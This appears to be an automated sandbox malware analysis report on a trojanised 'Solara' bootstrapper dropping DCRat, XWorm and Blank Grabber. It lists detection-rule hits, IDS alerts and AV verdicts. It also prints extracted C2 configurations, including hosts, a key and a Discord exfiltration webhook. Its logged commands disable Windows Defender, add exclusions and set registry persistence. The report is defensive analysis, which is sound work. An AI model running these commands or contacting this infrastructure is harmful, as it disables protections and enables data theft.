                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe", CommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe, NewProcessName: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe, OriginalFileName: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe", ProcessId: 8060, ProcessName: dwm.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7216, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7848, ProcessName: powershell.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\SysWOW64\it-IT\dasHost.exe", EventID: 13, EventType: SetValue, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 6252, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7768, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 6252, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ProcessId: 7372, ProcessName: cmd.exe
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Recovery\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Brokercrt\comReviewsession.exe, ProcessId: 7476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 6252, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svchosts.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svchosts.exe, ParentProcessId: 1436, ParentProcessName: svchosts.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" , ProcessId: 7200, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7380, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7552, ProcessName: powershell.exe
                        Timestamp:2024-08-05T14:32:59.584377+0200
                        SID:2034194
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T14:32:09.137117+0200
                        SID:2803305
                        Source Port:49733
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-08-05T14:32:30.632038+0200
                        SID:2034194
                        Source Port:49742
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T14:33:59.086310+0200
                        SID:2034194
                        Source Port:49753
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T14:33:28.018339+0200
                        SID:2034194
                        Source Port:49750
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T14:32:59.511299+0200
                        SID:2855924
                        Source Port:49745
                        Destination Port:27573
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-08-05T14:33:10.882003+0200
                        SID:2034194
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-08-05T14:33:41.063699+0200
                        SID:2034194
                        Source Port:49752
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Vjy8d2EoqK.exeAvira: detected
                        Source: Vjy8d2EoqK.exeAvira: detected
                        Source: Vjy8d2EoqK.exeAvira: detected
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Brokercrt\comReviewsession.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                        Source: C:\Recovery\powershell.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"L\":\"*\",\"X\":\"~\",\"S\":\",\",\"W\":\"(\",\"d\":\"@\",\"A\":\"$\",\"M\":\"<\",\"j\":\"`\",\"h\":\"|\",\"Q\":\"#\",\"w\":\"-\",\"9\":\")\",\"C\":\";\",\"4\":\" \",\"H\":\"!\",\"B\":\"%\",\"0\":\"^\",\"y\":\"&\",\"3\":\">\",\"J\":\".\",\"5\":\"_\"}", "PCRT": "{\"f\":\"$\",\"6\":\".\",\"S\":\"-\",\"Q\":\"~\",\"c\":\"`\",\"i\":\"^\",\"b\":\"_\",\"M\":\"(\",\"w\":\"<\",\"e\":\">\",\"j\":\")\",\"l\":\"&\",\"I\":\" \",\"=\":\"#\",\"y\":\";\",\"X\":\",\",\"D\":\"!\",\"p\":\"%\",\"0\":\"*\",\"x\":\"|\"}", "TAG": "", "MUTEX": "DCR_MUTEX-8bX0OVuOnvbm27qz2KER", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false, "H1": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "H2": "http://a1009150.xsph.ru/@==gbJBzYuFDT", "T": "0"}
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackMalware Configuration Extractor: Xworm {"C2 url": ["cash-spoken.gl.at.ply.gg"], "Port": "27573", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                        Source: Built.exe.6252.3.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq"}
                        Source: C:\Brokercrt\comReviewsession.exeReversingLabs: Detection: 87%
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeReversingLabs: Detection: 87%
                        Source: C:\Program Files (x86)\jDownloader\iKSiRODBDWoPAMSDKBDQBFN.exeReversingLabs: Detection: 87%
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeReversingLabs: Detection: 87%
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeReversingLabs: Detection: 87%
                        Source: C:\Recovery\powershell.exeReversingLabs: Detection: 87%
                        Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\iKSiRODBDWoPAMSDKBDQBFN.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeReversingLabs: Detection: 39%
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeReversingLabs: Detection: 33%
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 91%
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeReversingLabs: Detection: 87%
                        Source: C:\Windows\addins\cmd.exeReversingLabs: Detection: 87%
                        Source: C:\Windows\apppatch\en-US\conhost.exeReversingLabs: Detection: 87%
                        Source: Vjy8d2EoqK.exeReversingLabs: Detection: 92%
                        Source: Vjy8d2EoqK.exeVirustotal: Detection: 84%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeJoe Sandbox ML: detected
                        Source: C:\Brokercrt\comReviewsession.exeJoe Sandbox ML: detected
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeJoe Sandbox ML: detected
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeJoe Sandbox ML: detected
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeJoe Sandbox ML: detected
                        Source: C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exeJoe Sandbox ML: detected
                        Source: C:\Recovery\powershell.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeJoe Sandbox ML: detected
                        Source: Vjy8d2EoqK.exeJoe Sandbox ML: detected
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: cash-spoken.gl.at.ply.gg
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: 27573
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: <123456789>
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: <Xwormmm>
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: XWorm V5.2
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: USB.exe
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: %AppData%
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpackString decryptor: XClient.exe
                        Source: Vjy8d2EoqK.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\6cb0b6c459d5d3
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe
                        Source: C:\Brokercrt\comReviewsession.exeDirectory created: C:\Program Files\7-Zip\Lang\18607e77f76bf7
                        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000003.1703373977.0000000006D29000.00000004.00000020.00020000.00000000.sdmp, svchosts.exe, 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000000.1694475780.00000000002C3000.00000002.00000001.01000000.00000006.sdmp, svchosts.exe, 00000002.00000003.1704318738.00000000055C7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
                        Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbv source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Built.exe, 00000001.00000003.1690578642.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2073776444.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2063693974.00007FFDF74E2000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: .pdb! source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Built.exe, 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmp
                        Source: Binary string: 0C:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: Built.exe, Built.exe, 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000003.00000002.2072519669.00007FFE130C1000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: Built.exe, 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000003.00000002.2073120722.00007FFE13221000.00000040.00000001.01000000.0000000D.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Built.exe, Built.exe, 00000003.00000002.2068139696.00007FFE10301000.00000040.00000001.01000000.0000001C.sdmp
                        Source: Binary string: mscorlib.pdb source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: XClient.exe, 00000006.00000002.2805106909.000000000137B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbzS source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb6SK source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Built.exe, 00000003.00000002.2072230759.00007FFE12E11000.00000040.00000001.01000000.0000001D.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Built.exe, 00000003.00000002.2071781331.00007FFE126EC000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Built.exe, 00000003.00000002.2069831298.00007FFE11ED1000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxC source: XClient.exe, 00000006.00000002.2837735994.000000001C2DE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb+ source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, 00000003.00000002.2068410527.00007FFE11511000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, 00000003.00000002.2068979662.00007FFE11EA1000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: indoC:\Windows\mscorlib.pdb source: XClient.exe, 00000006.00000002.2843074498.000000001C689000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,1_2_00007FF76D5C85A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF76D5C79B0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF76D5E0B84
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_0029A5F4
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_002AB8E0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,3_2_00007FF76D5C85A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00007FF76D5C79B0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF76D5E0B84
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code CacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\CacheJump to behavior
